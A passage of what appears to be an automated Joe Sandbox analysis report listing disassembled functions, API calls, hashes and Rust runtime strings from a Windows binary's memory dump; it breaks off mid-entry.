                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnvironmentFreeHandleStrings
                                                                                                        • String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
                                                                                                        • API String ID: 2431795302-4245703473
                                                                                                        • Opcode ID: 3f214feb76fa05853dde9431ecb6ba7c564baedc9cffdefa6c719c14bb5fe7de
                                                                                                        • Instruction ID: 4e6a9bdb6beecd50dc0443eca8c97099fae2c141871a66dcd3da13fbe85b41db
                                                                                                        • Opcode Fuzzy Hash: 3f214feb76fa05853dde9431ecb6ba7c564baedc9cffdefa6c719c14bb5fe7de
                                                                                                        • Instruction Fuzzy Hash: 0A41B462B0869250EB30FA32D8806FA9390FF45BE8F845432DD0D47796EE38E541C331
                                                                                                        Function 00007FF79E94F86C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnvironmentFreeHandleStrings
                                                                                                        • String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
                                                                                                        • API String ID: 2431795302-4245703473
                                                                                                        • Opcode ID: cced6e2ec2c232f54b9e9ef39c91bcd6a7a959812c10f776038642c4ab265a26
                                                                                                        • Instruction ID: 99c9c96be3f000911f224ebd38bbf8d65714e73603e8726377b170e3db6a092a
                                                                                                        • Opcode Fuzzy Hash: cced6e2ec2c232f54b9e9ef39c91bcd6a7a959812c10f776038642c4ab265a26
                                                                                                        • Instruction Fuzzy Hash: 4E318362A04A9295EB30FA72DC806F9A364FF45BA8F845432DE0D47796EF38D541C371
                                                                                                        Function 00007FF79E99DD36 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CCG
                                                                                                        • API String ID: 0-1584390748
                                                                                                        • Opcode ID: 7c3cbd8d043dbe7ee500ad9f982921b101fb08654013cfecdcbfb32fbcfe9d66
                                                                                                        • Instruction ID: 6e8e527b8f2b89a619b0766ea05160c976b1510486e4aa2bfde53a4076cc14cf
                                                                                                        • Opcode Fuzzy Hash: 7c3cbd8d043dbe7ee500ad9f982921b101fb08654013cfecdcbfb32fbcfe9d66
                                                                                                        • Instruction Fuzzy Hash: F6217C61E0D2024AFEB9727481D0378938A9F95770FAD8936CA1D87BD1DE1CE8C18233
                                                                                                        Function 00007FF79E951620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLastObjectSingleWait
                                                                                                        • String ID: SystemTime
                                                                                                        • API String ID: 2173817864-2656138
                                                                                                        • Opcode ID: b79c9265bfed5e0edb2903b6d41a05d1c8bc39e1239cf161ddccd533432c0a45
                                                                                                        • Instruction ID: de0cb0795f71b308986d110540b157c4edfcde5f1a81630261e4aa7ae58e9ae7
                                                                                                        • Opcode Fuzzy Hash: b79c9265bfed5e0edb2903b6d41a05d1c8bc39e1239cf161ddccd533432c0a45
                                                                                                        • Instruction Fuzzy Hash: B2216D22B09B0198FB20EB71E8817FD6764AF447A8F944131DE5C13BA9EF389186C371
                                                                                                        Function 00007FF79E94351B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileFindLastNextmemcpy
                                                                                                        • String ID: .
                                                                                                        • API String ID: 3684451505-248832578
                                                                                                        • Opcode ID: a83ac0a17b572a24873920af1541633784511c8d531b9238f944e5b3122dba3d
                                                                                                        • Instruction ID: 8d1344c5bd11555d362cd3fccda869be7756290ebd65a60189ef92ac48378525
                                                                                                        • Opcode Fuzzy Hash: a83ac0a17b572a24873920af1541633784511c8d531b9238f944e5b3122dba3d
                                                                                                        • Instruction Fuzzy Hash: D811A712F0862245FB71EA75E8813BDA3649B44764FD44031DE8D467C6EE3CE5C29372
                                                                                                        Function 00007FF79E964E50 Relevance: 6.6, APIs: 5, Instructions: 318COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: f5f3afad7970c487c78c5129e85000cb707cf9b7110f291600492a86c6d4a556
                                                                                                        • Instruction ID: 4a05284896183b836c7203fa566446877566bb8a580ce8338202ac05859c41a1
                                                                                                        • Opcode Fuzzy Hash: f5f3afad7970c487c78c5129e85000cb707cf9b7110f291600492a86c6d4a556
                                                                                                        • Instruction Fuzzy Hash: 15F1BF62A04F9085E711EF28E8457EDA3B4FB54B98F849125DF8C17765EF38E1A5C320
                                                                                                        Function 00007FF79E935700 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00007FF79E935753
                                                                                                          • Part of subcall function 00007FF79E950EF0: GetStdHandle.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF79E950F1F
                                                                                                          • Part of subcall function 00007FF79E950EF0: GetLastError.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF79E950F2F
                                                                                                        • memcpy.MSVCRT ref: 00007FF79E935850
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandleLastmemcpymemset
                                                                                                        • String ID: assertion failed: filled <= self.buf.init
                                                                                                        • API String ID: 3211292799-906094691
                                                                                                        • Opcode ID: 9f2c9f5d79112fe39365158ab55285c7026b61322db35e62fa8adb01d7bd1f22
                                                                                                        • Instruction ID: cf31367c6b5e8c8d377f6a2bbdfbc4129e12a1c645b1b7b8f7d51fb47e37d9cd
                                                                                                        • Opcode Fuzzy Hash: 9f2c9f5d79112fe39365158ab55285c7026b61322db35e62fa8adb01d7bd1f22
                                                                                                        • Instruction Fuzzy Hash: 6E71A276B04B4185EB24EB76D8801BDA761FB48BE8B944831CE1D57794DF3CE052D231
                                                                                                        Function 00007FF79E935BB0 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: freeaddrinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 2731292433-0
                                                                                                        • Opcode ID: 16ed5cc825eb54a38bdbfcfb039228942f1d86979281abac1946a1295f4e2622
                                                                                                        • Instruction ID: 9d3b53e17fa8680b62abdec8449bfff90f96f15b7595ea3e7a77e779e954cd4e
                                                                                                        • Opcode Fuzzy Hash: 16ed5cc825eb54a38bdbfcfb039228942f1d86979281abac1946a1295f4e2622
                                                                                                        • Instruction Fuzzy Hash: C2718C22A0479089E724EF74C4812EDB7B0FB48B5CF549125EF4D57B99EB38D9A1C360
                                                                                                        Function 00007FF79E94B300 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$CloseHandle
                                                                                                        • String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
                                                                                                        • API String ID: 2153058950-2658723938
                                                                                                        • Opcode ID: 4d3bcb887eb5d60c07f795f497c34881898d3305597cca5f4518fe4edb98dbf8
                                                                                                        • Instruction ID: 431d9dab2d452c91a1c75e3ce6948a0cb5c6bf14e8793058257ec93407acee6e
                                                                                                        • Opcode Fuzzy Hash: 4d3bcb887eb5d60c07f795f497c34881898d3305597cca5f4518fe4edb98dbf8
                                                                                                        • Instruction Fuzzy Hash: AD41E922704A6552FA25BB2299807B89750BF49FE4F884130DF4D07B92EF3DE5A38331
                                                                                                        Function 00007FF79E948FFE Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FileModuleName
                                                                                                        • String ID:
                                                                                                        • API String ID: 1026760046-0
                                                                                                        • Opcode ID: fb4405460e4ef8afa7e6ee4644351728eab897dff736a17fc563d3c12acc7592
                                                                                                        • Instruction ID: 5a8ca0b6d178d8d1d536fe1d39fb0992c755a9fb3940e859840d565767430031
                                                                                                        • Opcode Fuzzy Hash: fb4405460e4ef8afa7e6ee4644351728eab897dff736a17fc563d3c12acc7592
                                                                                                        • Instruction Fuzzy Hash: F831F7517047E249FB35BE769C857E9A354BB05BE8F840134ED1C9BBC6EE69A2008331
                                                                                                        Function 00007FF79E951C00 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FullNamePathmemcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 2929619185-0
                                                                                                        • Opcode ID: 92a81ae790cde6e2ad8ab26dfe0cb6653e1814c53c6e8b7d79e8b7a2654fb407
                                                                                                        • Instruction ID: 12e9493664925f2449eee6462aed2d6a8948bc5abf0d0968f6f355c3bfbc6cdc
                                                                                                        • Opcode Fuzzy Hash: 92a81ae790cde6e2ad8ab26dfe0cb6653e1814c53c6e8b7d79e8b7a2654fb407
                                                                                                        • Instruction Fuzzy Hash: BA31DF22A04FD15AE770AF72DC847EA6798BB05BECF900135DD5C5B7C1CE79A2408321
                                                                                                        Function 00007FF79E93CD57 Relevance: 6.0, APIs: 4, Instructions: 42synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2321548817-0
                                                                                                        • Opcode ID: cd234819808093e523c941382cd037edbe16b71f9fb7ee45fed4c388bd490d19
                                                                                                        • Instruction ID: d2828b815091cc2faeeb29c1751ceaa96d32efb6ccddd71c3aef9bea94b89092
                                                                                                        • Opcode Fuzzy Hash: cd234819808093e523c941382cd037edbe16b71f9fb7ee45fed4c388bd490d19
                                                                                                        • Instruction Fuzzy Hash: C7019232B1478196F760EA75D9403A9A7A4AB447A0F549030DE6C93789DF3CD990C332
                                                                                                        Function 00007FF79E947E60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs, xrefs: 00007FF79E94802E
                                                                                                        • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF79E948046
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs
                                                                                                        • API String ID: 1452528299-513854611
                                                                                                        • Opcode ID: aed944820c4ff97ba46419a47c76fa312d113af2be5a85ce08e8b0606597aa19
                                                                                                        • Instruction ID: 2a964434bde05c2efac5e4b2034aef585acbc6c0585117e44677506b06fdd117
                                                                                                        • Opcode Fuzzy Hash: aed944820c4ff97ba46419a47c76fa312d113af2be5a85ce08e8b0606597aa19
                                                                                                        • Instruction Fuzzy Hash: 97510232E045A18AF734AF65E4806FDB3B1FF44364F508129EE9943B94EB3CA581C721
                                                                                                        Function 00007FF79E955B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000000,?,00007FF79E941DCA), ref: 00007FF79E955BBE
                                                                                                        • TlsSetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF79E941DCA), ref: 00007FF79E955C19
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressSingleValueWake
                                                                                                        • String ID: assertion failed: is_unlocked(state)
                                                                                                        • API String ID: 741412973-3502192491
                                                                                                        • Opcode ID: da2c4ba34aa77a352e36bf536d0e6d29029739b6ea50faa7ea929ed43c8ffefd
                                                                                                        • Instruction ID: 75973e4965e6328e2fd4ce94e2982b6d825949f0ab317d4bd8a18032957972d0
                                                                                                        • Opcode Fuzzy Hash: da2c4ba34aa77a352e36bf536d0e6d29029739b6ea50faa7ea929ed43c8ffefd
                                                                                                        • Instruction Fuzzy Hash: 56218121F0A4064AFB766B3554843B9B3919F94B68FA4C034DE0D0B396DD2DD88387B2
                                                                                                        Function 00007FF79E951740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,00007FF79E93D9B8,?,?,?,?,?,?,00007FF79E927A96), ref: 00007FF79E951765
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF79E93D9B8,?,?,?,?,?,?,00007FF79E927A96), ref: 00007FF79E951800
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFrequencyLastPerformanceQuery
                                                                                                        • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                        • API String ID: 3362413890-2333694755
                                                                                                        • Opcode ID: 125f12cbf819ad59ff386bc5975b7acf701ca1fb5fc1d74b55788fa64a06a3e6
                                                                                                        • Instruction ID: 89e1638ecea76b3a0b033439eddc512df9239e9254ab2f6337481180d607a493
